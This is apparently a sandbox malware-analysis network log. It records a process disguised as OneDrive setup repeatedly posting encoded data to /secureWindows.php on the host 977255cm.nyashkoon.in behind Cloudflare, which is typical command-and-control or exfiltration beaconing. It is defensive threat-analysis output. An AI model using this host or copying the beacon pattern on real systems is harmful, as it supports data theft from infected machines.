                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:23:29.425164938 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1340
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:29.777234077 CET1340OUTData Raw: 52 55 59 56 55 5a 56 55 58 57 50 59 55 5d 5b 5b 54 59 5c 5c 59 52 5a 5f 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RUYVUZVUXWPYU][[TY\\YRZ_]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%-0X(8'[7.%#%=(_-)(]79<'*3_+C>0^&.* F$,Z*1
                                                        Oct 30, 2024 05:23:30.013386965 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:30.319641113 CET933INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:30 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dpGEh5BXW15zqnJso25AwgCPzlaAiEMZzvGzqbO%2F3VPnd3RIQ%2BV8Z0IRLlkCgNAca6paNSIHM4bKB3W2tC327qAcsNnr8hT16ChMQM14M0OCZHw9J7MCiimyotb1PklevCSVLL3tg6A%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a15c3e526c81-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1075&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1650&delivery_rate=1203657&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 39 38 0d 0a 01 1f 26 56 28 16 30 51 25 1d 08 58 2b 2c 04 06 2a 2e 25 00 30 22 24 5d 24 3f 22 5f 2a 3b 3f 5f 29 24 28 10 28 1c 0a 1f 20 08 2f 06 2a 2b 2f 46 0c 10 24 02 30 0c 05 53 28 30 2d 59 3e 01 2f 1a 22 20 29 03 3d 07 30 0d 21 30 34 5f 27 57 25 0f 2d 3d 22 1e 2d 43 21 06 2e 20 2b 0f 3e 00 21 57 08 14 22 5d 25 3c 30 04 27 3e 24 1b 32 0b 25 03 34 01 09 5d 23 3b 0c 58 3f 2b 20 55 26 20 30 13 27 23 3f 56 26 5f 2f 07 3e 31 20 0d 26 19 22 52 2e 0d 20 56 03 32 58 53 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 98&V(0Q%X+,*.%0"$]$?"_*;?_)$(( /*+/F$0S(0-Y>/" )=0!04_'W%-="-C!. +>!W"]%<0'>$2%4]#;X?+ U& 0'#?V&_/>1 &"R. V2XS0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        97192.168.2.450005188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:23:29.542385101 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:29.886553049 CET1076OUTData Raw: 57 50 5c 52 55 5d 53 56 58 57 50 59 55 51 5b 5c 54 58 5c 58 59 54 5a 5e 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WP\RU]SVXWPYUQ[\TX\XYTZ^]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%^,=(+"3#D9&(_&=Z/4\#''*(<&>$(Y/: F$,Z*
                                                        Oct 30, 2024 05:23:30.141432047 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:30.357450962 CET788INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:30 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HJ4jwtO7qYW9EzW6adb6HchgCad4bYIhxVok3Mo2sOtJUZCt%2FnZUf81JP5O4G1sESu1YJAhP3geJgSlqFbrDugEayH5GvBh6gUSkYP%2BRcWy6IvSalEX1Z7f%2BmoJdF7xp6UmLLq%2FEpa8%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a15d0ecc2fe8-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1409&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1124223&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        98192.168.2.450011188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:23:30.484951019 CET286OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Oct 30, 2024 05:23:30.839778900 CET1076OUTData Raw: 57 5f 59 57 55 59 53 51 58 57 50 59 55 5e 5b 5c 54 52 5c 5f 59 5d 5a 5e 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: W_YWUYSQXWPYU^[\TR\_Y]Z^]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%_-0&\=()'[;A9?%#,\4\7*1:(+!&+5_9: F$,Z*=
                                                        Oct 30, 2024 05:23:31.089333057 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:31.392759085 CET782INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:31 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=neAlo8KYhfi9cHaY4gwYoK9jW89xv1wgAN4tqREfGEM35QbijWaGZmNnatWNdJB8327aj%2BxG9lBmhxqm0vJPpSBGQKklvMdO0mgn3yZg8T2ilfBsTifwMu8cg14IHhzly5yykk3Yb3M%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a162fbaa6b71-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1005&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1362&delivery_rate=1483606&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        99192.168.2.450017188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:23:31.532834053 CET286OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Oct 30, 2024 05:23:31.886759043 CET1076OUTData Raw: 57 53 5c 56 55 59 56 54 58 57 50 59 55 5b 5b 59 54 5d 5c 5a 59 52 5a 59 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WS\VUYVTXWPYU[[YT]\ZYRZY]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%^80<"'$96(_1-'/X7: %9?]?C5'X.* F$,Z*)
                                                        Oct 30, 2024 05:23:32.183770895 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:32.356081009 CET783INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:32 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PNx3c9E3KsALlLq71ZFSTLLuyJcVaGDgySjAplh8BgSOLjmHeI5OnphmF4oq73S3QPcf2zhhU9A%2BN2nLrAi15KsXF1rx6o1T97Ovr%2Bq7bMnnD65vJDTzAnrMTQiJDsj0HIhrHnrMzD8%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a169ad31e85b-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1403&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1362&delivery_rate=1092006&cwnd=94&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        100192.168.2.450025188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:23:32.481703997 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:32.839766979 CET1076OUTData Raw: 52 53 5c 54 50 58 53 57 58 57 50 59 55 5e 5b 52 54 5b 5c 5a 59 5d 5a 5b 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RS\TPXSWXWPYU^[RT[\ZY]Z[]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%_;3"Y<8*X%-/C-(2;/, 9#Z19+^(&:'+&. F$,Z*=
                                                        Oct 30, 2024 05:23:33.102971077 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:33.274669886 CET788INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:33 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rlGRWm7MzgLjZxBldLF88rs0Jm82QnmNmbFbYNshWfXUM3%2FqNSCPgtzQ3gsR9Y4%2BWWBjVXeusFGcbIrppwJCMztPL8hFBI%2FzMCykT0Jirha8DnVfDquflErCXv5%2FsXy1aK9hGOkRMUI%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a16f5cde6b32-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1147&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1283687&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        101192.168.2.450031188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:23:33.404351950 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:33.761533976 CET1076OUTData Raw: 57 54 59 56 50 5d 56 56 58 57 50 59 55 5d 5b 59 54 5e 5c 5b 59 56 5a 5d 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WTYVP]VVXWPYU][YT^\[YVZ]]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%\-09=;2]'=;C.C?%=;8\7*?2: )6&36- F$,Z*1
                                                        Oct 30, 2024 05:23:33.994044065 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:34.194804907 CET790INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:34 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X6bMjrQHHsB3HlaqBt7boHlf%2BqI4rMBwzugsaiP8ZE5aclKHaIEbaG1FX%2BrWwb7Y4Ixi6Lz4pDYhB4db4tlCQdaFvyHYHETPWiDUBIQKqHmL5P2FOtqAcP%2B3%2Fu4qF%2FgknG3q8gC3WnI%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a1751ec20bd8-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1371&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1081404&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        102192.168.2.450037188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:23:34.325889111 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:34.684597969 CET1076OUTData Raw: 57 52 5c 5c 55 5c 56 50 58 57 50 59 55 51 5b 5e 54 5c 5c 59 59 50 5a 5f 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WR\\U\VPXWPYUQ[^T\\YYPZ_]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%/3"]<>X0B:$Z%[0,*(Y4\?&,(!]'^5[:: F$,Z*
                                                        Oct 30, 2024 05:23:34.957293034 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:35.275758028 CET785INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:35 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IBtCn0vKTTfdRTmiugAJMThytuDVlc1tCb%2FSdIHInLiSepWVkQq2I0FkOT92vDitynKLElQ6MkOMkxpUJffMRvtJh0tcVylxcF%2BtLRI04R3qp2WMJc9wLW5CYRugSm8thE%2BdQCQBVLc%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a17b2db4e96a-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2053&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=703937&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        103192.168.2.450044188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:23:35.333918095 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1340
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        104192.168.2.450045188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:23:35.410902977 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:35.763493061 CET1076OUTData Raw: 57 53 5c 52 55 54 56 55 58 57 50 59 55 59 5b 5a 54 59 5c 5d 59 51 5a 54 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WS\RUTVUXWPYUY[ZTY\]YQZT]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R&;_?(>]3+-,&-;# )'1()&(&/: F$,Z*!
                                                        Oct 30, 2024 05:23:36.005520105 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:36.320442915 CET784INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:36 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YEFQHMUv%2Fy9zZOTDSGl7oZo3Gc7gupyRbcUjeLVGM6WkHsdQF4RPDyiJKcr2EFIhQmg%2BEJPWpLO3Nmt1zawzjwaGVcoxyipU37E8oAEyowLkr3VP6R5mI2HkC2f3nyR8usNnw83hUQM%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a181ae35e542-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1140&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1189811&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        105192.168.2.450051188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:23:36.457453966 CET286OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Oct 30, 2024 05:23:36.809007883 CET1076OUTData Raw: 57 54 59 52 55 54 56 53 58 57 50 59 55 51 5b 59 54 53 5c 5d 59 53 5a 58 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WTYRUTVSXWPYUQ[YTS\]YSZX]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R&,0"X=+.\$-B,%02 ;' )+&: +3(- F$,Z*
                                                        Oct 30, 2024 05:23:37.048707962 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:37.361608982 CET787INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:37 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RYTcIOFFjgVLBTMpt6FCIs%2FN0%2BmgbmCc3wOjJzOsU0d6nDXu0J52TTj9B0OJZInl6DEo4IRnlEzfwZabXpGpdRbkP0pqVolfUfvQ%2BfQROIN3SOOJYAkj8iuFulgJ0%2FJyrVcTT9RGZ7M%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a1883c543ac0-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2156&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1362&delivery_rate=538490&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        106192.168.2.450057188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:23:37.489413023 CET286OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Oct 30, 2024 05:23:37.842703104 CET1076OUTData Raw: 57 51 5c 51 50 59 56 53 58 57 50 59 55 51 5b 53 54 58 5c 5f 59 57 5a 59 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WQ\QPYVSXWPYUQ[STX\_YWZY]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R&8 :=+='-7C:& [$=<Y,:/ 9$%#\?C)['(-:: F$,Z*
                                                        Oct 30, 2024 05:23:38.077231884 CET25INHTTP/1.1 100 Continue
